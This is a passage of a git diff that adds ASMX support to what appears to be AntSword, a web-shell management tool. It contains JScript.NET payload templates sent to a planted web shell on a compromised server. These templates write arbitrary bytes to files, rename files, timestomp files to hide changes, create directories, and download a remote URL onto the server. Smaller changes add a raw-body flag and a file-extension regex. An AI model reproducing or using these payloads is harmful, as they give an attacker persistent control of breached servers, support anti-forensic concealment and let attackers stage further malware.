+      `var P:String=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));var Z:String="#{buffer::content}";var B:byte[]=new byte[Z.Length/2];for(var i=0;i<Z.Length;i+=2){B[i/2]=byte(Convert.ToInt32(Z.Substring(i,2),16));}var fs:System.IO.FileStream=new System.IO.FileStream(P,System.IO.FileMode.Append);fs.Write(B,0,B.Length);fs.Close();Response.Write("1");`,
+  },
+
+  rename: {
+    _: `var src=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#))),dst=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::name}".substr(#randomPrefix#)));if (System.IO.Directory.Exists(src)){System.IO.Directory.Move(src,dst);}else{System.IO.File.Move(src,dst);}Response.Write("1");`,
+  },
+
+  retime: {
+    _: `var DD=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#))),TM=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::time}".substr(#randomPrefix#)));if(System.IO.Directory.Exists(DD)){System.IO.Directory.SetCreationTime(DD,TM);System.IO.Directory.SetLastWriteTime(DD,TM);System.IO.Directory.SetLastAccessTime(DD,TM);}else{System.IO.File.SetCreationTime(DD,TM);System.IO.File.SetLastWriteTime(DD,TM);System.IO.File.SetLastAccessTime(DD,TM);}Response.Write("1");`,
+  },
+
+  mkdir: {
+    _: `var D=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#)));System.IO.Directory.CreateDirectory(D);Response.Write("1");`,
+  },
+
+  wget: {
+    _: `var X=new ActiveXObject("Microsoft.XMLHTTP");var S=new ActiveXObject("Adodb.Stream");S.Type=1;S.Mode=3;S.Open();X.Open("GET",System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::url}".substr(#randomPrefix#))),false);X.Send();S.Write(X.ResponseBody);S.Position=0;S.SaveToFile(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::path}".substr(#randomPrefix#))),2);S.close;S=null;X=null;Response.Write("1");`,
+  },
+
+  filehash: {
+    _: ``.replace(/\n\s+/g, ''),
+    [arg1]: '#{newbase64::path}',
+  },
+})
diff --git a/source/core/base.js b/source/core/base.js
index 7176312c..cf8a5c46 100644
--- a/source/core/base.js
+++ b/source/core/base.js
@@ -15,7 +15,7 @@ class Base {
    * 是否支持 Raw Body
    */
   static get supportRawBody() {
-      return false;
+      return true;
     }
     /**
      * 初始化
diff --git a/source/modules/database/asmx/index.js b/source/modules/database/asmx/index.js
new file mode 100644
index 00000000..b3edbb7a
--- /dev/null
+++ b/source/modules/database/asmx/index.js
@@ -0,0 +1,5 @@
+//
+// 数据库驱动::ASMX
+//
+
+module.exports = require('../aspx/index');
\ No newline at end of file
diff --git a/source/modules/shellmanager/list/form.js b/source/modules/shellmanager/list/form.js
index c4addc43..a17615ff 100644
--- a/source/modules/shellmanager/list/form.js
+++ b/source/modules/shellmanager/list/form.js
@@ -265,7 +265,8 @@ class Form {
       if (_ == "url") {
         let file_match = {
           "php": /.+\.ph(p[345]?|s|t|tml)/,
-          "aspx": /.+\.as(px|mx)/,
+          "aspx": /.+\.as(px)/,
+          "asmx": /.+\.as(mx)/,
           "asp": /.+\.(as(p|a|hx)|c(dx|er))/,
           "jsp": /.+\.(jsp[x]?)/,
           "custom": /.+\.((jsp[x]?)|cgi)/